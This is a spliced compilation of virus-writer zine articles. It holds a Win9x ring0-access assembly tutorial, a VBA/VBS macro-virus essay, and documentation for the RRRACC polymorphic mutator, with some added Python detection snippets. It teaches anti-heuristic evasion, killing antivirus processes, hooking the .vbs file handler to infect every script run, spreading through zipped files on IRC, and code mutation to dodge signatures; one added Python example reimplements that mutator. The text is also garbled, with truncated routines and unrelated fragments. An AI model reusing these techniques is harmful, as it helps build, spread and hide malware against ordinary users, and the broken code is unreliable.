; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
;
;
;This is my first article about ring0, although I have been obsessed with
;this stuff for ages. In this article I'll discuss all known and unknown
;techniques we can use to obtain ring0 access in Win9x platform. I think
;ring0 quest for WinNT platform deserves its own article; I'm currently
;researching new ways to get ring0 for WinNT (including Win2000) using
;some exploits. But I'm afraid you will have to wait for a future 29A
;issue. Meanwhile, I hope you enjoy this article.
;
;I have collected some techniques from existing viruses (some of them are
;mine) and I have written some more that I believe haven't been used on
;any virus yet. If you happen to discover any other way to get ring0,
;please let me know... It'll be exciting for me to gain more ring0 power!
;
;As you have noticed, this article can be compiled with TASM32, heheheh
;I have decided to do it this way, so you can compile all code and follow
;step by step, as you read the explanations in the comments. I've tried to
;code without optimizations, so you don't suffer trying to understand what
;the code does. If by chance you find some strange code, skip it and get
;to next one ;-D
;
;Oh! btw, if you hear some ambulance in your PC speaker... don't panic ;-)
;If you hear nothing, please, go to a doctor!!! X-DDD
;
;Compile as follows:
; TASM32 -ml -m29A ring0.asm
; TLINK32 -Tpe -aa -c -x ring0.obj,ring0.exe,,import32.lib
;
;
;skip the beginning... it's boring ;-)
;(go directly to code section)
;
;
;Due to lack of time, I had to break this tutorial in two pieces. Part two
;will be available soon, along with WinNT stuff (i hope!)
;===================================================================
; LET's BEGIN ...
;===================================================================
.386p
locals
jumps
.model flat ;if u can read this, u dont need glasses hahahah
;===================================================================
; DATA SECTION
;===================================================================
.data
Freq db 08h
aNTDLL db 'NTDLL.DLL',0
aKERNEL32 db 'KERNEL32.DLL',0
GDTR db 6 dup(?)
IDTR db 6 dup(?)
LDTR dw ?
_LDTR db 6 dup(?)
FreeGDT1 dw ?
FreeLDT1 dw ?
CallGate db 6 dup(?)
VxdCall dd ?
;===================================================================
; CODE SECTION
;===================================================================
.code
;===> <===
;===> U should start reading HERE <===
;===> <===
; int 3 ;-)
push 0
push offset Msg0
push offset Msg1
push 0
call MessageBoxA
;Before jumping to ring0, we should detect the Windows platform. It should
;be Win9x, not WinNT. Here I present you many methods of doing so. They all
;should work fine... choose one...
call GetVersion
or eax,eax
jns @@WinNT
;This is a very simple and short method of detecting Win9x. The Kernel32
;is responsible for giving the control to the host (or virus entrypoint),
;by means of a "JMP EAX" instruction (that's why EAX contains the address
;of the EntryPoint in Win9x platforms). When Host gets control there is
;a dword pushed in the stack, which is the address of a KERNEL32 routine
;that gets control if we exit with a simple RET instruction. That code
;is inside KERNEL32, which has an image base of 0BFF70000h in Win9x
;platform. So, we can simply check high byte 0BFh to ensure that we
;are on Win9x.
;if you prefer a more optimized version, you can use the following code
;(only if you haven't pushed any value since you got control), extracted
;from my Repus.168 virus:
;
;(dont execute this here, because stack has been modified)
;
; pop eax
; push eax
; inc eax ; EAX<80000000h on WinNT platform
; jns @@WinNT
;We can also use GetModuleHandle API to check for modules that only WinNT
;has loaded in memory, such as: HAL.DLL, NTDLL.DLL, etc...
;Other possibility would be to use GetProcAddress API to get the address
;of a WinNT specific routine. If it doesnt exist, then we are not in WinNT
mov ecx,cs
xor cl,cl
jecxz @@WinNT
sldt cx
jcxz @@WinNT
;I think it's enough for detecting WinNT. There are a lot more ways of
;detecting WinNT platform. If you discover some short and interesting
;way, please send it to me. It would be convenient to use SEH to avoid
;unexpected errors while checking the platform. SEH can also be used
;to detect platform if you touch things that WinNT wouldn't permit it.
;I also suggest you make these checks metamorphic, so AVers cannot rely
;on this to discover suspicious behaviour.
;I know you can't wait more... so, lets start the Ring0 Quest...
mov ax,[esi]
mov word ptr [_LDTR+0],ax ; save limit of LDT
mov ax,[esi+2]
mov word ptr [_LDTR+2],ax ; save LDT base
mov al,[esi+4]
mov byte ptr [_LDTR+4],al
mov al,[esi+7]
mov byte ptr [_LDTR+5],al
;The CallGate mechanism is very simple. We only need a free GDT or LDT
;entry, to fill it with the address of our ring0 code, the ring0 selector
;(we have used 28h which is Win9x ring0 code selector, but you can create
;your own ring0 code selector instead) and the right bits to make it work
;as a 32-bit callgate. To get into ring0 we just need to make a call far
;to the chosen ring0 code selector, and any offset (it doesn't matter
;which one we use); in our example we have chosen a null offset. When
;our ring0 code gets control, CS:EIP has been pushed into the stack,
;so in order to get back to ring3, we must use the RETF instruction.
call Search_GDT
mov [FreeGDT1],ax
and dword ptr [CallGate],0
mov word ptr [CallGate+4],ax
call Search_LDT
or al,4
mov [FreeLDT1],ax
;We can do the same with interrupt 03h, using the int3 one-byte opcode
;or the two-byte interrupt instruction:
push dword ptr [esi+(8*3)+0] ; save IDT entry
push dword ptr [esi+(8*3)+4]
db 0CDh,03h ; ring0!
;If you want more anti-debugging ways, try to use interrupt 01h. You can
;use the interrupt instruction (2 bytes) or you can use the undocumented
;opcode 0F1h which has the same effect (it may not work on some weird
;processors?)
db 0CDh,01h ; ring0!
db 0F1h ; ring0!
;Now, we are gonna use another interrupt, no matter which one (but inside
;the IDT limits!), so we'll not only need to write the address of our ring0
;handler, but also the characteristics of the IDT descriptor, as well as
;the ring0 code selector. Lets try with interrupt 20h (used from ring0 to
;call VxD services, so if you use them, don't forget to restore IDT entry!)
;Lets have more fun with interrupts... Now we'll use last IDT entry:
mov eax,ebx
shl eax,5
add eax,90C300CDh
push eax
call esp ; execute in stack: "int N" --> ring0!
pop eax
;We already played with interrupts 01h and 03h in previous examples issuing
;a software interrupt, but now the processor is gonna do it for us. We'll
;generate a 01h trap exception activating TF flag, to force a single-step
;execution. As a result, the interrupt 01h will take control. Don't forget
;to disable TF inside int1, so that it doesn't get executed again and again
;(imagine what could happen if single-step is activated while restoring
;int1 original handler!)
pushfd
pop eax
or ah,1
push eax
popfd ; TF=1
nop ; ring0!
pushfd
pop eax
or ah,80h
push eax
popfd ; OF=1
into ; ring0!
xor eax,eax
div eax ; ring0!
mov edx,1
mov eax,0
div edx ; ring0!
push 2
push 1
xor eax,eax ; 0 is not between 1 and 2 :-)
pop eax
pop eax
db 0FFh,0FFh
;As you can see, there are plenty of ways to generate an exception,
;and take control in ring0 privilege. You can even patch the original
;handler with a jump without modifying IDT entry. Discover your own way.
;Be original! don't copy from this tutorial! :-)
;I think, I'll stop here... I have no time... I will just present you
;some of the titles for part two... perhaps it gives you some ideas...
@@Finish:
push 0
push offset Msg0
push offset Msg2
push 0
call MessageBoxA
jmp @@Exit
@@WinNT:
push 0
push offset Msg0
push offset Msg3
push 0
call MessageBoxA
@@Exit:
push 0
call ExitProcess
Start endp
;-------------------------------------------------------------------
pushad
popad
ret
Get_VxdCall endp
;-------------------------------------------------------------------
pushad
@@1:
@@2:
add eax,8
;if we haven't found any free GDT entry, lets use the last two entries
@@3:
popad
ret
Search_GDT endp
;-------------------------------------------------------------------
pushad
@@1:
@@2:
add eax,8
;if we haven't found any free GDT entry, lets use the last two entries
sub eax,7
@@3:
popad
ret
Search_LDT endp
;-------------------------------------------------------------------
pushad
call Beep
popad
ret
Ring0Code_ret endp
;-------------------------------------------------------------------
pushad
call Beep
popad
retf
Ring0Code_retf endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_iret endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_int1 endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_div endp
;-------------------------------------------------------------------
pushad
call Beep
popad
Ring0Code_bound endp
;-------------------------------------------------------------------
pushad
call Beep
popad
iretd
Ring0Code_arpl endp
;-------------------------------------------------------------------
pushad
mov al,0B6h
out 43h,al
mov al,[Freq]
out 42h,al
out 42h,al
xor byte ptr [Freq],0Ch ; Choose another frequency for next beep
; It sounds like an ambulance X-DDD
in al,61h
or al,3
out 61h,al
mov ecx,1000000h
loop $
and al,0FCh
out 61h,al
popad
ret
Beep endp
;===================================================================
;===================================================================
ends
end Start ; yeah! its the end! :-)
Four elephants on a tortoise!
(An essay about advanced VBx)
.by jackie
.Introduction
Hi there kids, this is your phunky ol' retired friend (!) back with another
sloppy tutorial about four elephants on a tortoise. In this essay I'm going
to talk about some kewl topics concerning coding viruses in VBx. Check the
short table of contents.
As you see, more or less none of you macro coders out there play around
with this stuff, except a few guys (the old punks, hehehe, hi there guys!)
who sat down for a while and thought about techniques like these. As a
result, your creations get detected as Class.xx, Marker.xx, Across.xx,
LoveLetter.xx, and so on; as you see, it seems like all your stuff is hacked
shit to the AV community. Well, oh boy, the answer is easy: most of you guys
just use old techniques, old schemes, old shit, old hacks instead of sitting
down, thinking, trying and researching. As output we can see masses of lame
macros. That's why there are 36 variants of Marker: because you guys just
change this and that in the code, not because Spo0ky has written all of 'em;
that was you guys. X-D And one thing you should keep in front of your eyes:
what counts in the VX community is the quality of coding and not the
quantity. No one will care if you write 1000s of viruses which are all just
hacks and strains. My friends, it's time to wake up and realize that virus
coding is not a thing of destruction, it's a thing of art. Every single line
of code represents its coder. I know that there are too many lame wanna-be
'coders' around who behave like the sickest guys on earth with the 'Yo, man,
I code virii man, get outta my way man!' attitude. These are the ones that
try to show off in front of their computer friends. These are the ones that
replace the original signatures and names in the original author's code and
claim to be a virus writer. Hihihi. If you are such a guy, I feel very sorry
for your poor stupid mind. It's time to change, young coder. Otherwise you
will never get it and you will never be accepted and understood. The best
example of lameness and attitude problems combined with the topic of viruses
is the virus section of the message board on a German 'hackers' site.
Viruses are not made to destroy the data of your ex-friend, etc.; get that,
kiddies. I could talk and discuss these guys for hours and hours, but this
is not the topic of this paper. I'm sorry dear reader, but I do not want you
to get like those lamers around the cyberspace. X-D So, after that short
column about general attitude, we can start with our first topic today;
let's see what we will have before going to bed...
I see, you're still here, young coder. Okies, let's see what we've got for
today. I am gonna tell you about the thing called 'Antiheuristics'. Well,
some time ago the AV community decided to use such a thing as 'Heuristics'
to scan for viruses, which really helped 'em a lot to detect viruses, and
they still use it. XD. Ok, as you might have realized, it's some kinda
special technique to detect viruses, and the thing we can do is called
'Antiheuristics', which are techniques that avoid heuristic detection of
your virus. If you are the proud owner of a copy of Norton AntiVirus 5.X or
higher, you might have noticed that thing which is called 'Bloodhound'. Heh,
this is NAV's heuristic engine. Pretty rad. XD. I think you have had your
experiences with it, but it's really easy to fake and I will show you how.
First you must get it into your head that the best medicine against
heuristics is a 'strange' coding style. I mean, try not to code in the
normal way; your code might look strange, but it's not detected. XD. For
general information about easy anti-heuristic coding please refer to my
other tutorial called 'A phreaky macro primer'. You should find some basics
in chapter 15.
I used the object 'Application' three times; the result is that the
heuristics won't see it for what it is meant to be.
As you can see, I used the object 'VBA' in front, which has the same result
for our purpose, but it fakes the heuristics.
Word.Application.Options.VirusProtection = j
Again, the object 'Word' in front and something special behind: a variable
without type and value. It werks! XD
j = j + 1
Set objCheesy = Word.Application.VBProject.VBComponents(j).CodeModule
I replaced the '1' for the component with a variable holding the value '1'.
It is just a basic trick.
As you can see, it looks strange, but it werks fine. You might have noticed
what I mean with 'strange' coding style. XD. To fake heuristics you just
need to sit down for a while and think, try, research, as I said before.
Well, these were some methods to code anti-heuristic code, and another one
is to add encryption, remove obvious commands, etc. I hope you got what
anti-heuristic means and what its purpose is in virus coding. Btw, here are
three lines of code that have not so much to do with anti-heuristics but
with killing AV monitors. They're taken from my W97M.Co0kie virus XD. Enjoy!
For y = 1 To Tasks.Count
If InStr(1, LCase(Tasks(y).Name), "vir") Then Tasks(y).Close
Next
This little piece of code does nothing more than kill all tasks that could
be a virus scanner. XD.
At the end of the chapter about anti-heuristics I wanted to tell you that
you can use these techniques in all areas, not only in Word. XD. I just did
the Word compatible code as an example, because most of you have never
touched any other application.
.Language and user independent coding
Dear young coder, you're still with me? Kewlie. Okies, let me get you into
another chapter, concerning 'language and user independent coding' this
time. As you coded your creations, or not, you might have run into this if
you wanted to do some stuff like a worm script for mIRC, or use WinZip, or
any other application. The key to our needs is to use the registry to get
all the information we need about the application we want to abuse. For
example, I will show you now how to get the 'Program files' directory.
p = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", _
"ProgramFilesDir")
This example werks for Word97, but it's easy to get the path from any other
Office application too. Just export the regkey with the shell command using
'regedit.exe', read it into a string and use InStr(), Mid(), etc. to get
the needed string. Easy, isn't it? But I want YOU to code, so no examples
for you. XD. Another example, to get the Windows directory no matter if we
are in Win9X or WinNT, is to use the Environ() function. Lemme show you how.
w = VBA.Environ("windir")
Well, nearly all programs have entries in the Windows registry where you can
get information like installation path, save directories, etc. Just try to
research a bit. You can see that this is a kewl method to get dirs, etc.,
because every infected user could have Windows in a different directory
than you or anyone else, even the directory for the programs. So if you want
to get language independent, use these tricks. XD.
Another thing I'm going to talk about in this paper is the infection of
Excel class modules. Well, I'm pretty sure that 90% of you dear readers have
never touched Excel or any other application than Word to write macros. Ok,
there is something that was a stone in my way of infecting Excel class stuff
since the first one was born. Lemme give you a brief intro to it.
The Excel class module can't be accessed via stuff like the ordinary
command '.VBComponents(1)', because the first component varies in every
.xls file. So we were forced to use the name of the class module, which in
English versions of Excel is named 'ThisWorkbook'. Okies, so all viruses
which used this technique would only work under the version they were
hard-coded for, i.e. 'DieseArbeitsmappe' for the German version.
As I had nothing better to do, I sat down for a while and thought about a
solution to fix this language problem. Well, as God wanted, I found a little
trick to solve the problem. The class module of every VBA project has a
special number of properties by which I could identify it as the class
module. Look at the piece of code below, taken from my X97M.fireal, the
first class virus that is able to spread under all versions of Excel, no
matter what language.
First I walk through all the components, get the one I want and save the
virus code for later use in a variable. That's the routine fireal uses to
get its code, and I use the same style to find new classes to infect.
For Each fireal In book.VBProject.VBComponents
    If fireal.Properties.Count = 73 Then
        [...]
    End If
Next
This technique is called the 'Fireal-technic' and I'm sorry, I'm too stoned
to remember why it has such a name!? XD. I should take some vitamin pills.
Okies, I hope you got the clue and understood what I wanted to teach y'all
young coders.
In this chapter I will tell y'all something about the infection of
write-protected files and how to infect them. You will see it's pretty easy
to infect write-protected files, but there is one point that we have to
notice: the technique described here only works under Word97 SR-1 or higher
and Word2000. Besides that, there are two kinds of protection, the normal
write-protection of Windows and the VBA project protection. We can't yet
infect documents which are protected by VBA, but we can infect files
protected by Windows. Okies, let's drop some code.
If GetAttr(ActiveDocument.FullName) = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
[...]
SetAttr ActiveDocument.FullName, 1
Yummie, yummie. I hope everything fits tight... XD. While the world keeps
spinning around, I am gonna tell the young coders out there something about
a phreaky way to infect .vbs files. Since .vbs viruses use the same old
technique to search for and infect files, I took some of my little time and
invented a new technique to do it. It has something to do with hooking,
because each .vbs file that gets executed gets infected too. Well, the
theory is easy and the example code too. Let's see some code about the
'jackie theory of .vbs infection'. First of all you need the arguments.
Set objArguments = WScript.Arguments   ' arguments the script was started with
objArguments.Count                     ' number of arguments
objArguments(0)                        ' first argument (the .vbs the user ran)
objArguments(1)
[...etc...]
As you see, you can easily use these commands to make your .vbs virus kinda
resident. Just get the registry key of the .vbs shell command, like this:
Set objShell = CreateObject("WScript.Shell")
varCurrentShell = objShell.RegRead _
    ("HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\")   ' trailing \ = default value
Now you add yourself to this shell command, so that the new command would be,
for example, 'c:\windows\wscript.exe infinity.vbs %1' or something
equivalent. Now every .vbs file gets executed via your infected .vbs file,
and the '%1' argument hands you its path, so it's an easy trick to infect
all the files in that path, including the executed .vbs file itself. Ohhh,
last but not least, our virus has to execute the just-infected .vbs file
itself, otherwise it wouldn't run. Just use this.
That's all for that topic today. I wrote VBS/Infinity, which uses this
technique. Just toy around a bit with those code pieces. All is said and done. xD
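As an added example (not code from the page or from VBS/Infinity): the same registry value the text hooks is the thing a responder should audit. This Python function tokenises the default value of HKCR\VBSFile\Shell\Open\Command and flags any script inserted before the %1 placeholder. The sample values are constructed, and the winreg read is only used on a live Windows host.

```python
import re

# Interpreters that legitimately own the .vbs file association
INTERPRETERS = {'wscript.exe', 'cscript.exe'}

def split_command(value):
    """Tokenise a shell-open command line: double-quoted spans stay one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', value)]

def audit_vbsfile_handler(value):
    """Return (ok, reason) for the default value of HKCR\\VBSFile\\Shell\\Open\\Command.

    A hooked handler of the kind the text describes runs the virus script first
    and passes the real script on as %1, so anything that is not a wscript
    switch sitting before %1 is the tell.
    """
    tokens = split_command(value)
    if not tokens:
        return False, 'empty handler'
    interpreter = tokens[0].rsplit('\\', 1)[-1].lower()
    if interpreter not in INTERPRETERS:
        return False, 'unexpected interpreter: ' + tokens[0]
    if '%1' not in tokens[1:]:
        return False, 'script placeholder %1 missing'
    inserted = [t for t in tokens[1:tokens.index('%1')] if not t.startswith('/')]
    if inserted:
        return False, 'script(s) run before the real one: ' + ', '.join(inserted)
    return True, 'ok'

def read_vbsfile_handler():
    """Live read of the value on a Windows host (not used by the offline samples)."""
    import winreg
    return winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, r'VBSFile\Shell\Open\Command')

# Constructed sample values: a stock association and one hooked as in the text
CLEAN = r'"%SystemRoot%\System32\WScript.exe" "%1" %*'
HOOKED = r'c:\windows\wscript.exe infinity.vbs %1'

if __name__ == '__main__':
    for value in (CLEAN, HOOKED):
        print(audit_vbsfile_handler(value), '<-', value)
```

The check deliberately ignores wscript switches such as //E:vbscript, which legitimately sit before %1, and treats any other interpreter as a finding in its own right.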
Back with another topic today: I am going to tell y'all young coders about
a new interesting technique in virus coding, the vision of a virus which is
capable of updating itself via the WWW. Well, Vecna did it first (ya rule,
man) in asm, and I did it after that for all the macro people out there. xD.
There are two techniques which I researched. The first one is used by my
little example virus called W97M/One. It uses (Radio)ActiveX to update
itself. Just take a close look at the code below.
Well, all we do is get an ActiveX object (an Internet Explorer automation
object); after that we loop until our beloved IE is loaded. Then we let IE
load our source code file, or whatever, and loop again until IE has loaded
the file. We store the text, which is our source code, in a variable, and
voila, we have some new piece of code in it, so it's your decision what you
do with it now. xD.
My W97M/One uses some ID and an internal version number to check for an
update. This helps if there was no active connection, or the file wasn't
found for any other reason. Just be creative, well, at least a bit.
The second technique uses FTP.EXE to get the file from the net. All you need
is an FTP server where you can upload your updates. xD.
Now you should have your file on the user's HDD and you can work with it, but
it's not part of this paper to tell you how. Check it out for yourself. xD
As you see, it's no big deal, and as Mister Sandman says, the most important
thing is to be creative. xD. Here you are! As I said, just toy around with
that a bit.
Fasten your seatbelt, young coder: in this last chapter of 'Four elephants
on a tortoise!' I'm gonna show you some of the latest developments. I have
to say that this one is my favourite. XD. I'm going to tell y'all about the
kewl tool WinZip and its viral capabilities. What would you think if your
virus added itself to every .zip archive it can find on the user's PC? Rad?!
Aight! As you have to know, I have nothing better to do than writing shitty
papers about elephants and tortoises, just so you can learn a bit from them.
Okies, the first step in using this kewl technique is to check for the path
where WinZip is installed on the local machine.
As you read before, you can use the registry to get the needed information.
Would I be out of line if I gave you an example? Naawww. XD. Okies, let's
have some code here to learn from. It's taken from my WM97/2000.Incubus.
' With an empty file name, PrivateProfileString reads the registry instead
' of an .ini file; the key's default value holds the full path of WinZip
z = Application.System.PrivateProfileString("", _
    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
    "\CurrentVersion\App Paths\winzip32.exe", "")
Now we've got the path of WinZip in the variable 'z'. XD. Well, that you
know; I am not going to show you how to search for .zip files. Use VBA
commands or do it with a .vbs file as Incubus does. After you've got some
.zip files, you can use the following to add your virus to the file.
I hope I needn't say that your file names must have path information
included, for example 'c:\pictures.zip' and 'c:\windows\hiddenvirus.doc' or
something like that.
If you are kinda involved in viral stuff, you might have noticed that you
can write IRC worms using the script languages of mIRC, pIRCh, etc. Btw, IRC
is the place where we meet. XD. Okies, enough. There were some worms and
viruses that spread through IRC channels, so the developers of mIRC etc.
built in some kind of protection against some file types. Actually, all kewl
file types like .exe, .com, .vbs, .doc, etc. are ignored, so I came up with
the idea of letting my macro virus zip itself to get safely through the IRC
channels. XD. There are only two viruses which do it: first Co0kie and second
Incubus, both by, ehm.. my humble person. The concept is easy, and so is the
code. Lemme drop you an example here, taken from Co0kie.
z = Application.System.PrivateProfileString("", _
    "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
    "\CurrentVersion\App Paths\winzip32.exe", "")   ' path of winzip32.exe
w = Environ("windir")                               ' Windows directory
Basically it's the same as the code above. As you see, it creates a .zip
file in the Windows directory. The best thing about this is that mIRC doesn't
have .zip files on its damn auto-ignore list. XD.
There are some other WinZip command-line parameters which are more or less
useful for your viruses. Maybe you'll need 'em: use '-f' to freshen the
archive, '-m' to move, '-u' to update, '-r' to include subdirectories, '-p'
to store path information, '-ex' for maximum compression, etc, etc...
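Added example, not code from Co0kie or Incubus: the whole point of zipping the virus is that an extension denylist only sees the name that is offered. The Python below puts that naive name check next to a content check that opens the archive, and archives inside it, before deciding. The sample archives are built in memory, and the list of blocked extensions is the one the text quotes.

```python
import io
import zipfile

# Extensions the text says the IRC clients started refusing
BLOCKED = {'.exe', '.com', '.vbs', '.doc'}

def extension(name):
    """Lower-cased extension of a path written with either separator."""
    base = name.replace('\\', '/').rsplit('/', 1)[-1]
    return '.' + base.rsplit('.', 1)[-1].lower() if '.' in base else ''

def blocked_by_name(name):
    """The filter the text bypasses: it looks only at the offered file name."""
    return extension(name) in BLOCKED

def blocked_by_content(name, data, depth=0, max_depth=3):
    """Refuse the file if it, or anything inside an archive it carries, is on the list.

    Archives nested deeper than max_depth are not opened. An archive that
    cannot be read (corrupt, or members encrypted) is refused, not waved through.
    """
    if blocked_by_name(name):
        return True
    if data[:2] != b'PK' or depth >= max_depth:    # not a zip, or nested too deep
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(blocked_by_content(m.filename, zf.read(m), depth + 1, max_depth)
                       for m in zf.infolist())
    except (zipfile.BadZipFile, RuntimeError, EOFError, ValueError):
        return True

def make_zip(members):
    """Constructed in-memory archive from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for member, data in members.items():
            zf.writestr(member, data)
    return buf.getvalue()

def nest(data, levels):
    """Wrap an archive in `levels` further archives."""
    for i in range(levels):
        data = make_zip({'inner%d.zip' % i: data})
    return data

# Constructed samples: the zipped document the text describes, and a harmless archive
ZIPPED_DOC = make_zip({'hiddenvirus.doc': b'(constructed stand-in for a macro document)'})
HARMLESS = make_zip({'readme.txt': b'nothing to see'})

if __name__ == '__main__':
    print('name check   :', blocked_by_name('pictures.zip'))
    print('content check:', blocked_by_content('pictures.zip', ZIPPED_DOC))
```

The depth limit is a deliberate trade-off: without it a zip bomb or a deeply nested archive turns the check into a denial of service, so the limit is documented and whatever sits below it is simply not inspected.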
.Outroduction
Finally, another strange paper you read and I wrote reaches its end. Last
but not least, I have to mention a few kewl coders whose work I really
appreciate and which is phuckin' rad. XD. I'm talking about guys like
Knowdeth, LysKovick, Anti State Tortoise, VicodinES, Spo0ky, Foxz and some
others who walked together with me through the dark woods of new, innovative
macro techniques. Thank you guys, you really did kewl werk!
I dunno yet if there will be any new stuff coming from my side, because I
feel kinda lazy these days. A lot of shit happened and is happening and I'm
kinda forced to leave things aside. The only thing left to say which fits
lately is 'mens sana in corpore sano', but I dunno if it fits for me. If I
should burst into flames, I just want you to know that I love you all. xD
The last column of this paper is dedicated as an appeal to all the new guys
that come out of the ground from day to day. If you wanna learn, you're
welcome; otherwise, get the phuck outta our world. So, in this sense, don't
let the world bring you down, young coder, and remember, whatever tomorrow
brings, I could be there...XD. Sleep tight and listen to Black Sabbath!
.Greets'n'Thanks
Phewie, this time I'm gonna shorten my list of shout-outs a bit. Well, I
hope I do not forget any of the kewl souls out there...
.Linezer0 Network .Hi there tribe, CD, NtS, Hermes and all others!
.Metaphase .Phuckin' great team.
.Contact
If any of you feel like contacting me, you can use the following sources to
contact me. No spam please.
WorldWideWeb: http://www.coderz.net/jackie/
EMail: jackie@coderz.net
IRC: Undernet #virus
ICQ: 36135930
.Kewl Music
You can also access the directories table and the sections and look them
up. Those sections and directories which are known (like imports, exports,
relocations, resources) are displayed to their full extent, allowing you to
see everything.
Good luck!
A word of warning
~~~~~~~~~~~~~~~~~
This tool is not intended for use by novice users, since you will need
in-depth assembler knowledge to know what kind of operands cause which
flags to be set, or which operands you can change without creating the
possibility that one of the generated sources will not compile properly,
or, even worse, produces a virus that is defective! RRRACC also isn't
foolproof yet, and it could benefit from a lot of improvements, so if you
don't use it with care, disasters could happen. In other words,
General
~~~~~~~
Rajaats Recursive Random Assembler Code Creator, RRRACC for short (and if
you still don't like it you can pronounce it as ROCK), is a utility that
processes text files, recognizes special tokens which it uses to randomize
the input, and writes the result to an output file. This does not have to
be assembler code, but my primary intention was to make it work mainly with
assemblers.
Invocation
~~~~~~~~~~
To invoke RRRACC on a file, use the following syntax:
RRRACC infile.ext outfile.ext
----------
Rajaats Recursive Random Assembler Code Creator (RRRACC) Version 1.03
Internal Version Id RRRACC1.03
Statistics:
1 mutation out of 8.88520724322027e+62 possible complete mutations
1 mutation out of 589824 possible line mutations
1 mutation out of 1.50641670112106e+57 possible variable mutations
1 mutation out of 1 possible variable ranges
Please be nice and do not remove the header of the generated file, it is
for educational purpose only. :-)
Comments to rajaat@itookmyprozac.com
----------
Please note that RRRACC doesn't have strong error checking, so you had
better get familiar with the inner workings of the tokens, which I will
explain to you in the next section. You also might get shocked at the large
numbers in the statistics. These are mathematically correct, assuming the
instructions are very different in nature; a '1 out of 1' figure means that
no mutations of that type were performed.
ASM to RRRACC
~~~~~~~~~~~~~
The most common use of RRRACC is probably converting an existing
virus source to a RRRACC parseable one, which is easiest to do in
the beginning. If you grow more accustomed to the use of RRRACC you
might want to write directly code that can be parsed by it.
This might not seem a lot, and indeed I think it is yet a start, but
if properly applied, this can create tons of variants from one
single RRRACC source.
! mov ax,4202h
! xor cx,cx
! xor dx,dx ; DON'T USE CWD!
int 21h
would mean that the first three lines can be emitted in random order. I
also hereby present you the first caveat you could get yourself entangled
in. If you are an optimizing fanatic and change the xor dx,dx to a cwd, it
might generate a sequence like this
cwd
mov ax,4202h
xor cx,cx
where you don't know what value ax had before it was sign-extended into
dx:ax. You are in luck only if ax already happens to be less than 8000h, so
that dx ends up as zero anyway. If you don't understand this, go buy a book
about assembler or surf the internet to get one.
Well, as you see, it's not hard to use RRRACC; it's more a problem of
knowing assembler right. Another example
! pop ds
! cmp ax,4b00h
jz infect
would be perfectly right, since the pop ds instruction does not affect the
flags, so the cmp ax,4b00h is allowed to be swapped before it. But look out
for this
! pop ds
! mov word ptr ds:[old_21],bx
since the second line depends on ds being set properly, you can't swap
these.
Combining
~~~~~~~~~
The true power of RRRACC (yuck) comes in view when you combine
both the line randomizer and the random variable substitution.
I'll show you a little example again:
~rndzero1 = ( "xor" "sub" )
~rndzero2 = ( "xor" "sub" )
! mov ax,4202h ; seek eof
! ~rndzero1 cx,cx
! ~rndzero2 dx,dx
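As an added example that is not RRRACC's own code: the two tokens documented above are enough to write a small reimplementation in Python. parse() reads the ~name = ( ... ) definitions, mutate() shuffles each run of '!' lines and substitutes every variable with one random pick held constant across the file, and mutation_space() computes the 'line mutations' and 'variable mutations' figures of the kind the RRRACC header prints. The sample source is the one from the combining section; the token grammar beyond what the text shows (whitespace handling, quoting inside the parentheses) is this example's assumption.

```python
import math
import random
import re
import shlex

DEF_RE = re.compile(r'^\s*~(\w+)\s*=\s*\((.*)\)\s*$')   # ~name = ( "a" "b" )
VAR_RE = re.compile(r'~(\w+)')                           # ~name inside a line

def parse(text):
    """Split a RRRACC-style source into {variable: choices} and the body lines."""
    defs, body = {}, []
    for line in text.splitlines():
        m = DEF_RE.match(line)
        if m:
            defs[m.group(1)] = shlex.split(m.group(2))   # '"xor" "sub"' -> ['xor', 'sub']
        else:
            body.append(line)
    return defs, body

def _runs(body):
    """Group consecutive '!' lines into swappable runs; everything else stays fixed."""
    runs, current = [], []
    for line in body:
        if line.lstrip().startswith('!'):
            current.append(line.lstrip()[1:].strip())
            continue
        if current:
            runs.append((True, current))
            current = []
        runs.append((False, [line]))
    if current:
        runs.append((True, current))
    return runs

def mutate(text, seed):
    """One variant: each '!' run in random order, each variable replaced by one pick."""
    defs, body = parse(text)
    rng = random.Random(seed)
    picks = {name: rng.choice(values) for name, values in defs.items()}
    out = []
    for swappable, lines in _runs(body):
        lines = list(lines)
        if swappable:
            rng.shuffle(lines)
        out.extend(lines)

    def substitute(m):
        if m.group(1) not in picks:
            raise KeyError('undefined RRRACC variable ~' + m.group(1))
        return picks[m.group(1)]

    return '\n'.join(VAR_RE.sub(substitute, line) for line in out)

def mutation_space(text):
    """(line mutations, variable mutations, complete mutations) for a source."""
    defs, body = parse(text)
    line_mut = math.prod(math.factorial(len(lines))
                         for swappable, lines in _runs(body) if swappable)
    var_mut = math.prod(len(values) for values in defs.values())
    return line_mut, var_mut, line_mut * var_mut

# Constructed sample: the combining example from the text, with the int 21h added back
SAMPLE = '''~rndzero1 = ( "xor" "sub" )
~rndzero2 = ( "xor" "sub" )
! mov ax,4202h ; seek eof
! ~rndzero1 cx,cx
! ~rndzero2 dx,dx
int 21h'''

if __name__ == '__main__':
    print(mutation_space(SAMPLE))
    print(mutate(SAMPLE, 29))
```

Running it shows why the statistics grow so fast: three swappable lines give 3! orders, two two-way variables give 4 substitutions, and the product is already 24 distinct outputs of what is, semantically, one routine. The caveat from the text holds unchanged: the tool has no idea whether the swapped lines are really independent.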
Future
~~~~~~
RRRACC is very powerful in its simplicity, still it lacks a lot of things I
would like to add before I start on my GRACE project, like
Contact
~~~~~~~
If you have any questions or bug reports (this does not include
invalid use, read the docs), feel free to mail them to
rajaat@itookmyprozac.com and I'll try to answer them. You can also
check my website for new updates or new programs, which is located
at
